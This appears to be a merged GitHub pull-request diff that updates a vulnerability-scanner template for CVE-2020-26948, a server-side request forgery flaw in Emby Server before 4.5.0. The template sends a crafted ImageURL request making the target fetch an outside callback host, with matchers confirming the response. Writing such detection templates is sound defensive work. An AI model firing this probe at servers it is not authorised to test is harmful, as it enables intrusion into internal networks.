Skip to content
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
21 changes: 12 additions & 9 deletions http/cves/2020/CVE-2020-26948.yaml
Original file line number Diff line number Diff line change
@@ -1,20 +1,21 @@
id: CVE-2020-26948

info:
name: Emby Server Server-Side Request Forgery
name: Emby < 4.5.0 - Server Server-Side Request Forgery
author: dwisiswant0
severity: critical
description: Emby Server before 4.5.0 allows server-side request forgery (SSRF) via the Items/RemoteSearch/Image ImageURL parameter.
description: |
Emby Server before 4.5.0 allows server-side request forgery (SSRF) via the Items/RemoteSearch/Image ImageURL parameter.
impact: |
An attacker can exploit this vulnerability to access internal resources, perform port scanning, and potentially pivot to other systems.
remediation: |
Apply the latest security patches or upgrade to a patched version of Emby Server.
reference:
- https://github.com/btnz-k/emby_ssrf
- https://nvd.nist.gov/vuln/detail/CVE-2020-26948
- https://github.com/btnz-k/emby_ssrf/blob/master/emby_scan.rb
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/Live-Hack-CVE/CVE-2020-26948
- https://nvd.nist.gov/vuln/detail/CVE-2020-26948
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
Expand All @@ -35,21 +36,23 @@ info:
http:
- method: GET
path:
- "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net"
- "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://oast.fun"

matchers-condition: and
matchers:
- type: word
part: body
words:
- "Name or service not known"
- "Interactsh Server"

- type: word
part: header
part: content_type
words:
- "text/plain"
- "text/html"
- "application/octet-stream"

- type: status
status:
- 500
# digest: 490a0046304402205aab2b7d67f632b300b0c6cc8826ced3929017f7c84a6bd6e3a1f3558fa1c68402206a10ba6600fa71e733e2dc56214d9ace0fde30a50a18152216e5c8ad7729f902:922c64590222798bb761d5b6d8e72950
- 200

# digest: 490a0046304402205aab2b7d67f632b300b0c6cc8826ced3929017f7c84a6bd6e3a1f3558fa1c68402206a10ba6600fa71e733e2dc56214d9ace0fde30a50a18152216e5c8ad7729f902:922c64590222798bb761d5b6d8e72950